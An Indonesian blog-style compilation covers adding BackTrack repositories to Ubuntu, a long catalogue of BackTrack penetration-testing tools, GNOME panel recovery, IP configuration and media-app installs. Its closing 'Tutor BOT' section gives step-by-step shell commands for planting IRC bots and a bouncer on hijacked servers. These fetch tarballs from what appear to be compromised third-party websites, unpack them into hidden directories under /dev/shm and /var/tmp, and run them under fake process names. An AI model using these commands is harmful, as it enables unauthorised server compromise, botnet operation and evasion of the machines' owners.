Install Aplikasi Backtrack di Ubuntu

Untuk pengguna Ubuntu yang mau coba aplikasi backtrack….
Untuk pengguna Ubuntu yg pengen coba aplikasi backtrack….!!!
1. Edit file sources.list
#sudo gedit /etc/apt/sources.list
2. Tambahkan repository backtrack
deb http://archive.offensive-security.com pwnsauce main microverse macroverse restricted universe multiverse
3. Lalu Add Key melalui terminal
#sudo wget -q http://archive.offensive-security.com/backtrack.gpg -O- | sudo apt-key add –
4. Perbarui daftar paket:
#sudo apt-get update
5. Install aplikasi backtrack
#sudo apt-get install nama-aplikasi-backtrack

List Aplikasi

 1.1 Information Gathering
o 1.1.1 0trace 0.01
o 1.1.2 Ass
o 1.1.3 dig
o 1.1.4 DMitry
o 1.1.5 DNS-Ptr
o 1.1.6 dnstracer 1.5
o 1.1.7 dnswalk
o 1.1.8 dns-bruteforce
o 1.1.9 dnsenum
o 1.1.10 dnsmap
o 1.1.11 DNSPredict
o 1.1.12 Finger Google
o 1.1.13 Firewalk
o 1.1.14 Fport 2.0 (Windows Executable)
o 1.1.15 Goog Mail Enum
o 1.1.16 Google-search
o 1.1.17 Googrape
o 1.1.18 Gooscan
o 1.1.19 Host
o 1.1.20 InTrace 1.3
o 1.1.21 Itrace
o 1.1.22 Maltego 2.0
o 1.1.23 Metagoofil 1.4
o 1.1.24 Mbenum 1.5.0 (Windows Executable)
o 1.1.25 Netenum
o 1.1.26 Netmask
o 1.1.27 Nmbscan 1.2.4
o 1.1.28 Protos
o 1.1.29 PsTools (Windows Executables)
+ 1.1.29.1 PsInfo
+ 1.1.29.2 PsFile
+ 1.1.29.3 PsList
+ 1.1.29.4 PsGetSID
+ 1.1.29.5 PsLoggedOn
+ 1.1.29.6 PsLogList
o 1.1.30 PStoreView 1.0 (Windows Binary)
o 1.1.31 QGoogle
o 1.1.32 Relay Scanner
o 1.1.33 SMTP-Vrfy
o 1.1.34 Subdomainer 1.3
o 1.1.35 TCPtraceroute 1.5beta7
o 1.1.36 TCtrace
o 1.1.37 Whoami (Windows Executable)
* 1.2 Network Mapping
o 1.2.1 Amap 5.2
o 1.2.2 Angry IP Scanner (ipscan) 3.0-beta3
o 1.2.3 Autoscan 0.99_R1
o 1.2.4 Fierce 0.9.9 beta 03/24/07
o 1.2.5 Fping
o 1.2.6 Genlist
o 1.2.7 Hping
o 1.2.8 Hping2 2.0.0-rc3
o 1.2.9 Hping3 3.0.0-alpha-1
o 1.2.10 IKE-Scan
o 1.2.11 IKEProbe
o 1.2.12 Netcat 0.7.1
o 1.2.13 Netdiscover
o 1.2.14 Nmap
o 1.2.15 NmapFE
o 1.2.16 P0f
o 1.2.17 PSK-Crack
o 1.2.18 Ping
o 1.2.19 Protos
o 1.2.20 ScanLine 1.01 (Windows Executable)
o 1.2.21 Scanrand
o 1.2.22 SinFP
o 1.2.23 Umit
o 1.2.24 UnicornScan
o 1.2.25 UnicornScan pgsql 0.4.6e module version 1.03
o 1.2.26 XProbe2
o 1.2.27 PBNJ 2.04
+ 1.2.27.1 OutputPBNJ
+ 1.2.27.2 ScanPBNJ
o 1.2.28 Zenmap 4.60
* 1.3 Vulnerability Identification
o 1.3.1 Absinthe
o 1.3.2 Bed
o 1.3.3 CIRT Fuzzer
o 1.3.4 Checkpwd
o 1.3.5 Cisco Auditing Tool
o 1.3.6 Cisco Enable Bruteforcer
o 1.3.7 Cisco Global Exploiter
o 1.3.8 Cisco OCS Mass Scanner
o 1.3.9 Cisco Scanner
o 1.3.10 Cisco Torch
o 1.3.11 Curl
o 1.3.12 Fuzzer 1.2
o 1.3.13 GFI LanGuard 2.0
o 1.3.14 GetSids
o 1.3.15 HTTP PUT
o 1.3.16 Halberd
o 1.3.17 Httprint
o 1.3.18 Httprint GUI
o 1.3.19 ISR-Form
o 1.3.20 Jbrofuzz
o 1.3.21 List-Urls
o 1.3.22 Lynx
o 1.3.23 Merge Router Config
o 1.3.24 Metacoretex
o 1.3.25 Metoscan
o 1.3.26 Mezcal HTTP/S
o 1.3.27 Mibble MIB Browser
o 1.3.28 Mistress
o 1.3.29 Nikto
o 1.3.30 OAT
o 1.3.31 Onesixtyone
o 1.3.32 OpenSSL-Scanner
o 1.3.33 Paros Proxy
o 1.3.34 Peach
o 1.3.35 RPCDump
o 1.3.36 RevHosts
o 1.3.37 SMB Bruteforcer
o 1.3.38 SMB Client
o 1.3.39 SMB Serverscan
o 1.3.40 SMB-NAT
o 1.3.41 SMBdumpusers
o 1.3.42 SMBgetserverinfo
o 1.3.43 SNMP Scanner
o 1.3.44 SNMP Walk
o 1.3.45 SQL Inject
o 1.3.46 SQL Scanner
o 1.3.47 SQLLibf
o 1.3.48 SQLbrute
o 1.3.49 Sidguess
o 1.3.50 Smb4K
o 1.3.51 Snmpcheck
o 1.3.52 Snmp Enum
o 1.3.53 Spike
o 1.3.54 Stompy
o 1.3.55 SuperScan
o 1.3.56 TNScmd
o 1.3.57 Taof
o 1.3.58 VNC_bypauth
o 1.3.59 Wapiti
o 1.3.60 Yersinia
o 1.3.61 sqlanlz
o 1.3.62 sqldict
o 1.3.63 sqldumplogins
o 1.3.64 sqlquery
o 1.3.65 sqlupload
* 1.4 Penetration
o 1.4.1 Framework3-MsfC
o 1.4.2 Framework3-MsfUpdate
o 1.4.3 Framework3-Msfcli
o 1.4.4 Framework3-Msfweb
o 1.4.5 Init Pgsql (autopwn)
o 1.4.6 Milw0rm Archive
o 1.4.7 MsfCli
o 1.4.8 MsfConsole
o 1.4.9 MsfUpdate
o 1.4.10 OpenSSL-To-Open
o 1.4.11 Pirana
o 1.4.12 Update Milw0rm
* 1.5 Privilege Escalation
o 1.5.1 Ascend attacker
o 1.5.2 CDP Spoofer
o 1.5.3 Cisco Enable Bruteforcer
o 1.5.4 Crunch Dictgen
o 1.5.5 DHCPX Flooder
o 1.5.6 DNSspoof
o 1.5.7 Driftnet
o 1.5.8 Dsniff
o 1.5.9 Etherape
o 1.5.10 EtterCap
o 1.5.11 File2Cable
o 1.5.12 HSRP Spoofer
o 1.5.13 Hash Collision
o 1.5.14 Httpcapture
o 1.5.15 Hydra
o 1.5.16 Hydra GTK
o 1.5.17 ICMP Redirect
o 1.5.18 ICMPush
o 1.5.19 IGRP Spoofer
o 1.5.20 IRDP Responder
o 1.5.21 IRDP Spoofer
o 1.5.22 John
o 1.5.23 Lodowep
o 1.5.24 Mailsnarf
o 1.5.25 Medusa
o 1.5.26 Msgsnarf
o 1.5.27 Nemesis Spoofer
o 1.5.28 NetSed
o 1.5.29 Netenum
o 1.5.30 Netmask
o 1.5.31 Ntop
o 1.5.32 PHoss
o 1.5.33 PackETH
o 1.5.34 Rcrack
o 1.5.35 SIPdump
o 1.5.36 SMB Sniffer
o 1.5.37 Sing
o 1.5.38 TFTP-Brute
o 1.5.39 THC PPTP
o 1.5.40 TcPick
o 1.5.41 URLsnarf
o 1.5.42 VNCrack
o 1.5.43 WebCrack
o 1.5.44 Wireshark
o 1.5.45 Wireshark Wifi
o 1.5.46 WyD
o 1.5.47 XSpy
o 1.5.48 chntpw
* 1.6 Maintaining Access
o 1.6.1 3proxy
o 1.6.2 Backdoors
o 1.6.3 Matahari
o 1.6.4 CryptCat
o 1.6.5 HttpTunnel Client
o 1.6.6 HttpTunnel Server
o 1.6.7 ICMPTX
o 1.6.8 Iodine
o 1.6.9 NSTX
o 1.6.10 Privoxy
o 1.6.11 ProxyTunnel
o 1.6.12 Rinetd
o 1.6.13 TinyProxy
o 1.6.14 sbd
o 1.6.15 socat
* 1.7 Covering Tracks
o 1.7.1 Housekeeping
* 1.8 Radio Network Analysis
o 1.8.1 802.11 WIFI
+ 1.8.1.1 AFrag
+ 1.8.1.2 ASLeap
+ 1.8.1.3 aircrack-ng
+ 1.8.1.4 airdecap-ng
+ 1.8.1.5 aireplay-ng
+ 1.8.1.6 airmon-ng
+ 1.8.1.7 Airpwn
+ 1.8.1.8 AirSnarf
+ 1.8.1.9 airbase-ng
+ 1.8.1.10 airodump-ng
+ 1.8.1.11 Airoscript
+ 1.8.1.12 Airsnort
+ 1.8.1.13 CowPatty
+ 1.8.1.14 FakeAP
+ 1.8.1.15 Hotspotter
+ 1.8.1.16 Karma
+ 1.8.1.17 Kismet
+ 1.8.1.18 MDK3
+ 1.8.1.19 MacChanger
+ 1.8.1.20 WifiTap
+ 1.8.1.21 Wicrawl
+ 1.8.1.22 WifiZoo
+ 1.8.1.23 Wlassistant
+ 1.8.1.24 SpoonDRV
+ 1.8.1.25 SpoonWEP
o 1.8.2 Bluetooth
+ 1.8.2.1 BTcrack
+ 1.8.2.2 Bluebugger
+ 1.8.2.3 Blueprint
+ 1.8.2.4 Bluesmash
+ 1.8.2.5 Bluesnarfer
+ 1.8.2.6 Btscanner
+ 1.8.2.7 Carwhisperer
+ 1.8.2.8 Frontline
+ 1.8.2.9 Minicom
+ 1.8.2.10 ObexFTP
+ 1.8.2.11 HCIDump
+ 1.8.2.12 Redfang
+ 1.8.2.13 Ussp-Push
+ 1.8.2.14 atshell
+ 1.8.2.15 attest
+ 1.8.2.16 bdaddr
+ 1.8.2.17 bss
+ 1.8.2.18 btftp
+ 1.8.2.19 hcidump-crash
+ 1.8.2.20 hidattack
+ 1.8.2.21 hstest
+ 1.8.2.22 rfcomm
* 1.9 VOIP & Telephony Analysis
o 1.9.1 PcapSipDump
o 1.9.2 PcapToSip_RTP
o 1.9.3 SIPSak
o 1.9.4 SIPcrack
o 1.9.5 SIPdump
o 1.9.6 SIPp
o 1.9.7 Smap
* 1.10 Digital Forensics
o 1.10.1 Allin1
o 1.10.2 Autopsy
o 1.10.3 DCFLDD
o 1.10.4 DD_Rescue
o 1.10.5 Foremost
o 1.10.6 Magicrescue
o 1.10.7 Mboxgrep
o 1.10.8 Memfetch
o 1.10.9 Memfetch Find
o 1.10.10 Pasco
o 1.10.11 Rootkithunter
o 1.10.12 Sleuthkit
o 1.10.13 Vinetto
* 1.11 Reverse Engineering
o 1.11.1 GDB GNU Debugger
o 1.11.2 GDB Console GUI
o 1.11.3 GDB Server
o 1.11.4 GNU DDD
o 1.11.5 Hexdump
o 1.11.6 Hexedit
o 1.11.7 OllyDBG
* 1.12 Services
o 1.12.1 SNORT

Menambahkan Repo Lokal di Linux Backtrack

Ketikan perintah berikut:

root@bt:~# nano /etc/apt/sources.list

# GXRG BACKTRACK REPOSITORY
deb http://bt.gxrg.org/repo/all revolution main microverse non-free testing
deb http://bt.gxrg.org/repo/32 revolution main microverse non-free testing
deb http://bt.gxrg.org/repo/source revolution main microverse non-free testing

# OFFICIAL BACKTRACK REPOSITORY
#deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
#deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
#deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing
 
Kemudian tambahkan repo tersebut di atas, kebetulan dari Gunadarma J IT Club.

Mengembalikan Panel di Linux Backtrack GNOME

Mungkin teman-teman pernah dengan tidak sengaja menghilangkan/delete panel di linux, kan biasanya di linux gnome memiliki 2 Panel default yaitu Panel Atas dan Panel Bawah. Berikut cara memperbaikinya dan menampilkan ke Panel defaultnya.

Caranya:
Masuk ke Terminal bisa dengan cara Ctrl + Alt + T
Ketikan Perintah ini di Terminal

gconftool –recursive-unset /apps/panel
rm -rf ~/.gconf/apps/panel
pkill gnome-panel
sudo reboot

Tunggu komputernya setelah restart, kembali deh seperti semula!

Cara Pengaturan IP di Linux

Setiing IP dan Wireless di Linux, kebetulan pakai Backtrack 5

Untuk melihat konfigurasi dari Interface Jaringan kita ketikan perintah ifconfig. Memulai networking biasanya menggunakan WICD tpi sebelumnya ketik dulu di console:
root@bt:~# /etc/init.d/wicd start
lalu klik :
menu — internet — wicd netwok manager

setting ip dynamic:
root@bt:~# dhclient
— interface disini bisa saja eth0 atau eth1 dan kalau untuk wireless wlan5.


Setting IP static
misalnya :
interface – eth0
IP Address – 192.168.1.9/24
Default Gateway – 192.168.1.1
DNS server – 192.168.1.1
maka perintah yang digunakan adalah :

root@bt:~# ifconfig eth0 192.168.1.9/24
root@bt:~# route add default gw 192.168.1.1
root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf

settingan ini akan kembali default bila di reboot, untuk menjadikan permanen maka kita perlu meng-edit file /etc/network/interfaces,

root@bt:~# nano /etc/network/interfaces

auto eth0
iface eth0 inet static
address 192.168.1.9
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1

kemudian save dengan menggunakan perintah CTRL+X kemudian jawab y kemudian enter

root@bt:~# update-rc.d networking defaults
root@bt:~# /etc/init.d/networking restart

Install Aplikasi di Backtrack 5

Install Codec Pemutar Musik dan Video
root@bt:~# apt-get install ubuntu-restricted-extras

Pemutar Musik GNOME

Audacious
root@bt:~# apt-get install audacious
Rhythmbox
root@bt:~# add-apt-repository ppa:webupd8team/rhythmbox && sudo apt-get update 
root@bt:~# apt-get install rhythmbox
Pemutar Musik KDE 
Amarok
root@bt:~# apt-get install amarok 
Pemutar Video
VLC
root@bt:~# apt-get install vlc
MPlayer
root@bt:~# apt-get install gnome-mplayer
GIMP Image Editor
root@bt:~# apt-get install gimp
InkSpace
root@bt:~# apt-get install inkscape
Geany (Compiler Programming)
root@bt:~# apt-get install geany
Merekam Aktifitas Desktop
root@bt:~# apt-get install gtk-recordmydesktop
Aplikasi Webcam
root@bt:~# apt-get install cheese
Itulah hal-hal yang diperlukan setelah kita selesai menginstall Linux Backtrack 5, semoga bermanfaat! ^^

Tutor BOT

=============================================== 
comand 2x dasar untuk server linux dan free Bsd
———————————————–
untuk load file kedalam shell : wget,lwp-download , curl -f -O ,dan fetch
untuk melihat direktori yg tidak permission denied : find / -type d -perm 777
untuk membuat direktori baru untuk directory yes : mkdir nama file contoh : mkdir lucky
untuk melihat semua file dalam sebuah direktory : ls -alF
untuk melihat ip shell : /sbin/ifconfig | grep inet
Tcl bot untuk server : linux
—————————-


*tcl bot busuk:
————
1 cd /dev/shm;wget http://intranet.stantonmortgage.com/modules/admin/lucky/busuk.tar.gz
2 cd /dev/shm;tar zxvf busuk.tar.gz
3 cd /dev/shm;rm -fr busuk.tar.gz
4 cd /dev/shm/.dev12;./nadya busuk.txt nama bot ident ip chanel owner bot
5 cd /dev/shm/.dev12;./dssl busuk.txt/.dev12;./dssl busuk
contoh langkah ke 4 ;cd /dev/shm/.dev12;./nadya busuk.txt FLORESTER flores 200.226.246.22 tengkorakcrew co_94u1

*tcl Chanary
————
1 cd /var/tmp;wget http://intranet.stantonmortgage.com/modules/admin/lucky/chanarybot.tar.gz
2 cd /var/tmp;tar -zxvf chanarybot.tar.gz
3 cd /var/tmp;rm -fr chanarybot.tar.gz
4 cd /var/tmp/.dat;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5 cd /var/tmp/.dat;./dssl a.txt
contoh langkah ke 4 ; cd /var/tmp/.dat;./nadya a.txt Lucky_mantap ok 202.148.11.99 tengkorakcrew co_94u1

*tcl NeTgate
————-
1 cd /var/tmp;wgethttp://intranet.stantonmortgage.com/modules/admin/lucky/dalnet.tgz
2 cd /var/tmp;tar -zxvf dalnet.tgz
3 cd /var/tmp;rm -rf dalnet.tgz
4 cd /var/tmp/irclordz;./nadya config.txt nick ident shellsnya channel owner
5 cd /var/tmp/irclordz;./dssl config.txt
contoh langkah ke 4 ; cd /var/tmp/irclordz;./nadya config.txt FLORESTER panji 222.124.128.154 tengkorakcrew co_94u1

Tcl Samseng
———–
1. cd /var/tmp;wget http://k-is.info/samseng.tgz
2. cd /var/tmp;tar zxfv samseng.tgz
3. cd /var/tmp;rm -fr samseng.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./dssl a.txt
contoh langkah ke 4 ;cd /var/tmp/.sh;./nadya a.txt FLORESTER panji 222.124.128.154 tengkorakcrew co_94u1

menambahkan TCL
————–
untuk tcl bisa langsungload :
cd /var/tmp/.dat/scripts;wget http://intranet.stantonmortgage.com/modules/admin/lucky/PortCheck2.0.tcl
cd /var/tmp/.dat;./tcl -t a.txt PortCheck2.0.tcl
cd /var/tmp/.dat/scripts;wget http://www.sevenstartraders.com/busuk/detik.tcl (bisa pilih tcl yg kita inginkan)
cd /var/tmp/.dat;./tcl -t a.txt detik.tcl

setelah tcl selesai di load tinggal pv bot dan ketik: rehash

————————
*untuk psy server linux:
————————
1 cd /var/tmp;wget http://intranet.stantonmortgage.com/modules/admin/lucky/psy.tar.gz
2 cd /var/tmp;tar -zxvf psy.tar.gz
3 cd /var/tmp;rm -fr psy.tar.gz
4. cd /var/tmp/.psy;./config (PORT)
5. cd /var/tmp/.psy;./fuck
6. cd /var/tmp/.psy;./run

setelah selesai run langsung konek ajah /server ip (port)

*untuk server BsD:
——————
1. cd /var/tmp;fetch http://intranet.stantonmortgage.com/modules/admin/lucky/bsd.tar.gz
2. cd /var/tmp;tar -zxvf bsd.tar.gz
3. cd /var/tmp;rm -fr bsd.tar.gz
4. cd /var/tmp/.psy;./config (PORT)
5. cd /var/tmp/.psy;./fuck
6. cd /var/tmp/.psy;./run

setelah selesai run langsung konek ajah /server ip (port)

*langkah untuk bikin botscan *
—————————–
1.cd /var/tmp;wget http://intranet.stantonmortgage.com/modules/admin/lucky/baliemhacker.txt
2.cd /var/tmp;perl baliemhacker.txt [nama.server.irc] [nick.bot] [identd.bot] [nama.channel] [Owner] [fake.process]

cotohuntuk no 2: cd /var/tmp;perl baliemhacker.txt irc.dal.net T_scan setan perum co_94u1 /usr/bin/http
=================================================================